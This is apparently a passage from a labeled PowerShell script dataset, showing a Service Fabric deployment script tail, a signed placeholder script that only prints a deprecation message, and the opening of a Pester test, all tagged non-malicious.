}
if ($publishProfile.CopyPackageParameters.CompressPackage)
{
$PublishParameters['CompressPackage'] = $publishProfile.CopyPackageParameters.CompressPackage
}
if ($publishProfile.RegisterApplicationParameters.RegisterApplicationTypeTimeoutSec)
{
$PublishParameters['RegisterApplicationTypeTimeoutSec'] = $publishProfile.RegisterApplicationParameters.RegisterApplicationTypeTimeoutSec
}
# CopyPackageTimeoutSec parameter overrides the value from the publish profile
if ($CopyPackageTimeoutSec)
{
$PublishParameters['CopyPackageTimeoutSec'] = $CopyPackageTimeoutSec
}
# RegisterApplicationTypeTimeoutSec parameter overrides the value from the publish profile
if ($RegisterApplicationTypeTimeoutSec)
{
$PublishParameters['RegisterApplicationTypeTimeoutSec'] = $RegisterApplicationTypeTimeoutSec
}
if ($IsUpgrade)
{
if ($StartupServicesFile)
{
$PublishParameters['StartupServicesFileMode'] = $true
}
$Action = "RegisterAndUpgrade"
if ($DeployOnly)
{
$Action = "Register"
}
$UpgradeParameters = $publishProfile.UpgradeDeployment.Parameters
if ($OverrideUpgradeBehavior -eq 'ForceUpgrade')
{
# Warning: Do not alter these upgrade parameters. It will create an inconsistency with Visual Studio's behavior.
$UpgradeParameters = @{ UnmonitoredAuto = $true; Force = $true }
}
$PublishParameters['Action'] = $Action
$PublishParameters['UpgradeParameters'] = $UpgradeParameters
$PublishParameters['UnregisterUnusedVersions'] = $UnregisterUnusedApplicationVersionsAfterUpgrade
Publish-UpgradedServiceFabricApplication @PublishParameters
}
else
{
# Pass the path to the Startup Services File if it was provided
if ($StartupServicesFile)
{
$PublishParameters['StartupServicesFilePath'] = $StartupServicesFile
if (-not [string]::IsNullOrEmpty($publishProfile.StartupServiceParameterFile))
{
$PublishParameters['StartupServiceParameterFilePath'] = $publishProfile.StartupServiceParameterFile
}
}
$Action = "RegisterAndCreate"
if ($DeployOnly)
{
$Action = "Register"
}
$PublishParameters['Action'] = $Action
$PublishParameters['OverwriteBehavior'] = $OverwriteBehavior
$PublishParameters['SkipPackageValidation'] = $SkipPackageValidation
Publish-NewServiceFabricApplication @PublishParameters
}
|
combined_dataset/train/non-malicious/sample_32_28.ps1
|
sample_32_28.ps1
|
<#
.SYNOPSIS
SyncServiceIIS.ps1 script file
This is a place-holder file only for agent patch build purposes
#>
Write-Host "This file functionality is deprecated and is place-holder only"
# SIG # Begin signature block
# MIIoKgYJKoZIhvcNAQcCoIIoGzCCKBcCAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCDl6hxqgry3XZSs
# CPe36BD1TrOY7xbsiI1oyJ1d5Nz6JKCCDXYwggX0MIID3KADAgECAhMzAAADrzBA
# DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA
# hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG
# 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN
# xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL
# go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB
# tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw
# RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW
# MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci
# tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG
# CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0
# MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd
# mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ
# 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY
# 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp
# XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn
# TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT
# e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG
# OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O
# PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk
# ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx
# HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt
# CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq
# hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5
# IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG
# EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG
# A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg
# Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC
# CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03
# a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr
# rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg
# OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy
# 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9
# sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh
# dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k
# A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB
# w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn
# Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90
# lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w
# ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o
# ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD
# VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa
# BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny
# bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG
# AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t
# L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV
# HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG
# AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl
# AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb
# C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l
# hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6
# I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0
# wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560
# STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam
# ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa
# J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah
# XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA
# 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt
# Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr
# /Xmfwb1tbWrJUnMTDXpQzTGCGgowghoGAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw
# EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN
# aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp
# Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB
# BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO
# MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIMI/BzqZ0GCB6dL+oY1mn4B4
# sOMC+b6Kxq+9fbz1kGTLMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A
# cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB
# BQAEggEANGKkWlFEFBK02E9C9QfYI7/E0XY9d7ArOSx+pp0qZAX0FHiElUV//+9c
# 5bdbsTx7Xk2AxbQugWJHUMITCcOP0R1OlYE0eSGWNZYkU7BZj+HC2RDQ6USqHoL5
# uosBXvYgm/8KmtEoLqFANGPF4xfemeKYd2UVHN+nctnH9QX33WX7zDIoy9EfA+sE
# cRaEWnEdxUZkx+gvIfdKi/mFBpJwlWD5BxaQrOzYjvSFFOfubN7+9tNy8d4OCrrA
# MDa0g/SpLBJvUqKIpcZeYaKxquSa7VcVMGFdjYY3x4DUkownqu9OflBfXnspfdyx
# GAA+NhLyxMEZNs2O1q3L/D5esL+4bKGCF5QwgheQBgorBgEEAYI3AwMBMYIXgDCC
# F3wGCSqGSIb3DQEHAqCCF20wghdpAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFSBgsq
# hkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl
# AwQCAQUABCCldp6MgktUU20X2OJb+klF2/cEUGkPYxWbY9YYIoGf6gIGZjK4fM/1
# GBMyMDI0MDUwMjE3NTMzNS44ODJaMASAAgH0oIHRpIHOMIHLMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l
# cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046QTQwMC0w
# NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Wg
# ghHqMIIHIDCCBQigAwIBAgITMwAAAezgK6SC0JFSgAABAAAB7DANBgkqhkiG9w0B
# AQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE
# BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD
# VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAeFw0yMzEyMDYxODQ1
# MzhaFw0yNTAzMDUxODQ1MzhaMIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz
# aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv
# cnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25z
# MScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046QTQwMC0wNUUwLUQ5NDcxJTAjBgNV
# BAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2UwggIiMA0GCSqGSIb3DQEB
# AQUAA4ICDwAwggIKAoICAQCwR/RuCTbgxUWVm/Vdul22uwdEZm0IoAFs6oIr39VK
# /ItP80cn+8TmtP67iabB4DmAKJ9GH6dJGhEPJpY4vTKRSOwrRNxVIKoPPeUF3f4V
# yHEco/u1QUadlwD132NuZCxbnh6Mi2lLG7pDvszZqMG7S3MCi2bk2nvtGKdeAIL+
# H77gL4r01TSWb7rsE2Jb1P/N6Y/W1CqDi1/Ib3/zRqWXt4zxvdIGcPjS4ZKyQEF3
# SEZAq4XIjiyowPHaqNbZxdf2kWO/ajdfTU85t934CXAinb0o+uQ9KtaKNLVVcNf5
# QpS4f6/MsXOvIFuCYMRdKDjpmvowAeL+1j27bCxCBpDQHrWkfPzZp/X+bt9C7E5h
# PP6HVRoqBYR7u1gUf5GEq+5r1HA0jajn0Q6OvfYckE0HdOv6KWa+sAmJG7PDvTZa
# e77homzx6IPqggVpNZuCk79SfVmnKu9F58UAnU58TqDHEzGsQnMUQKstS3zjn6SU
# 0NLEFNCetluaKkqWDRVLEWbu329IEh3tqXPXfy6Rh/wCbwe9SCJIoqtBexBrPyQY
# A2Xaz1fK9ysTsx0kA9V1JwVV44Ia9c+MwtAR6sqKdAgRo/bs/Xu8gua8LDe6KWyu
# 974e9mGW7ZO8narDFrAT1EXGHDueygSKvv2K7wB8lAgMGJj73CQvr+jqoWwx6Xdy
# eQIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFPRa0Edk/iv1whYQsV8UgEf4TIWGMB8G
# A1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8GA1UdHwRYMFYwVKBSoFCG
# Tmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUy
# MFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBsBggrBgEFBQcBAQRgMF4w
# XAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2Vy
# dHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwG
# A1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQD
# AgeAMA0GCSqGSIb3DQEBCwUAA4ICAQCSvMSkMSrvjlDPag8ARb0OFrAQtSLMDpN0
# UY3FjvPhwGKDrrixmnuMfjrmVjRq1u8IhkDvGF/bffbFTr+IAnDSeg8TB9zfG/4y
# bknuopklbeGjbt7MLxpfholCERyEc20PMZKJz9SvzfuO1n5xrrLOL8m0nmv5kBcv
# +y1AXJ5QcLicmhe2Ip3/D67Ed6oPqQI03mDjYaS1NQhBNtu57wPKXZ1EoNToBk8b
# A6839w119b+a9WToqIskdRGoP5xjDIv+mc0vBHhZGkJVvfIhm4Ap8zptC7xVAly0
# jeOv5dUGMCYgZjvoTmgd45bqAwundmPlGur7eleWYedLQf7s3L5+qfaY/xEh/9uo
# 17SnM/gHVSGAzvnreGhOrB2LtdKoVSe5LbYpihXctDe76iYtL+mhxXPEpzda3bJl
# hPTOQ3KOEZApVERBo5yltWjPCWlXxyCpl5jj9nY0nfd071bemnou8A3rUZrdgKIa
# utsH7SHOiOebZGqNu+622vJta3eAYsCAaxAcB9BiJPla7Xad9qrTYdT45VlCYTtB
# SY4oVRsedSADv99jv/iYIAGy1bCytua0o/Qqv9erKmzQCTVMXaDc25DTLcMGJrRu
# a3K0xivdtnoBexzVJr6yXqM+Ba2whIVRvGcriBkKX0FJFeW7r29XX+k0e4DnG6iB
# HKQjec6VNzCCB3EwggVZoAMCAQICEzMAAAAVxedrngKbSZkAAAAAABUwDQYJKoZI
# hvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw
# DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x
# MjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAy
# MDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMC
# VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV
# BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp
# bWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC
# AQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXIyjVX9gF/bErg4r25Phdg
# M/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPF
# dvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6
# GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v3byNpOORj7I5LFGc6XBp
# Dco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pGve2krnopN6zL64NF50Zu
# yjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpGdc3E
# XzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0
# lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1q
# GFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ
# +QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PA
# PBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIurQIDAQABo4IB3TCCAdkw
# EgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxG
# NSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMFwGA1UdIARV
# MFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEWM2h0dHA6Ly93d3cubWlj
# cm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAK
# BggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMC
# AYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvX
# zpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20v
# cGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYI
# KwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG
# 9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0x
# M7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmC
# VgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1bSNU5HhTdSRXud2f8449
# xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4rPf5KYnDvBewVIVCs/wM
# nosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDS
# PeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDFNLB62FD+CljdQDzHVG2d
# Y3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxn
# GSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+Crvs
# QWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokL
# jzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL
# 6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggNN
# MIICNQIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp
# bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw
# b3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEn
# MCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOkE0MDAtMDVFMC1EOTQ3MSUwIwYDVQQD
# ExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQCO
# HPtgVdz9EW0iPNL/BXqJoqVMf6CBgzCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w
# IFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6d3flDAiGA8yMDI0MDUwMjA5NDcw
# MFoYDzIwMjQwNTAzMDk0NzAwWjB0MDoGCisGAQQBhFkKBAExLDAqMAoCBQDp3d+U
# AgEAMAcCAQACAg98MAcCAQACAhUMMAoCBQDp3zEUAgEAMDYGCisGAQQBhFkKBAIx
# KDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAIAgEAAgMBhqAwDQYJKoZI
# hvcNAQELBQADggEBAAB4qyZJh4RD43gu6eJrtcNpXz7lW/zAjmgVHrjCJ8gXTaDL
# x5YX/9G8LehGkPg548ilkhvfdwKLIkAtPnU/K8zME0UqxCDSJNrs97EGqOpxCyEF
# Y4GMFIbjXggl/xZYgxcZXiz94zLD8A+cK/88m5hxyjzEKr2W1QQurAjyl0ZjB9h2
# wR3ZYBkmo6WjpMtpsapB0OY2ytKFrZdNC7lvW59P8H2j0FxJa+5+1B/A2mv9co+S
# pJhmuzsfV8o7y33kAnUCZ9ra6KR4dEMwTE0gJ1rUf5RWrP1q+ZQD/AWUIgl2AXx2
# ZpQ5tS51P3/83fc1Z0MlMjJJjmlNK7rJySdfBNExggQNMIIECQIBATCBkzB8MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNy
# b3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAezgK6SC0JFSgAABAAAB7DAN
# BglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEEMC8G
# CSqGSIb3DQEJBDEiBCCl35oZn+qlSAJPB+/gTdOuY3a8J6BlrkYr1a8WMAv5MjCB
# +gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EICcJ5vVqfTfIhx21QBBbKyo/xciQ
# IXaoMWULejAE1QqDMIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldh
# c2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBD
# b3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIw
# MTACEzMAAAHs4CukgtCRUoAAAQAAAewwIgQgEL9xiG5Hj6RZ6hqznNr4/ikwk4O+
# C7ZdyjgMRPwsp5UwDQYJKoZIhvcNAQELBQAEggIAE73HXE+KJ6LwztuScgwxxPSr
# fHDpQJ9Z+pvHu7JNoizKAyyvDtWK1/ywoBtM38FlWqz+paUK/adyJWF/gBQHqvoK
# rKd120Hic9R4HcC7De9Zaen5yNElirj29KtQtAqtDE6NlxOQX7FyTImbXppguR+T
# zuGQvR063yrhDKk4U21FZFaDtxzzVwiTlk6RatN/VHWcrLRRpK5/tWGE951FZ1eb
# hld8TqDafRXtR2rpZLf3CZruizEZOf++ox/B+docIb+3/EdQZeHNvgNNEIPauCqE
# uVynULmQ5vFpQ0NrYtqp2B5Nt63TNs6ZogcOcPIs1JqF92AUfqZW8+wftgG9qydF
# 3BynCbnuxulaTFDSlIvytEEUEniA72ALouKKsJ2ppn91SLvUE3w/CR+V9fZy1RYO
# Ka2vs/r++3+GoZ1OMwSRWFYjoCV9P8nuaZDPMNhl5fTfyYYJSwe+Xr5AJG0zo7pN
# sea4F27tK7BXHjkgvWvdzTdRjayDg1aCwYXBuB+TiGcWaH9BNH1tpoPAEMJNJenm
# gmWuHPZHkXH8n9gr5gcCcIUVs4zc6CL8aL+bIrHNa+vu2ecel9ekIHDMpf+w704m
# H2VFFze/eRL0INrPSeDtIemzHia5LT2Xk1GveLukQ6B+S9WA+u6aK7m31Kixz9sf
# yidub4z3IF19YMSafms=
# SIG # End signature block
|
combined_dataset/train/non-malicious/870.ps1
|
870.ps1
|
$here = Split-Path -Parent $MyInvocation.MyCommand.Path
$sut = (Split-Path -Leaf $MyInvocation.MyCommand.Path) -replace '\.Tests', ''
. "$here\$sut"
$clusterName = $ENV:ClusterName
$httpUserPassword = $ENV:HttpPassword
$securePassword = ConvertTo-SecureString $httpUserPassword -AsPlainText -Force
